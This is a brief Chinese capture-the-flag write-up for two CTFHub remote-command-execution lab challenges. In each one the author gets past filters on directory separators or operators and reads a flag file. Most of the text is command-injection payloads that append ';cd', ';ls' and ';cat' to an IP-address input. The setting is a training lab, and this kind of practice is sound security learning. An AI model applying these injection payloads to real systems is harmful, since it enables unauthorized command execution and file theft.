ctfhub技能树—RCE—过滤目录分隔符，过滤运算符

过滤目录分隔符

打开靶机

查看页面信息

查询当前目录下文件结构

进入flag_is_here目录

127.0.0.1;cd flag_is_here
127.0.0.1||ls

执行之后发现还是在当前目录

使用如下命令进行查询

127.0.0.1;cd flag_is_here;ls

查看文件信息

127.0.0.1;cd flag_is_here;cat flag_1633660217512.php

成功拿到flag

过滤运算符

查看文件结构

;ls

查看文件信息

;cat flag_46031110028241.php

成功拿到flag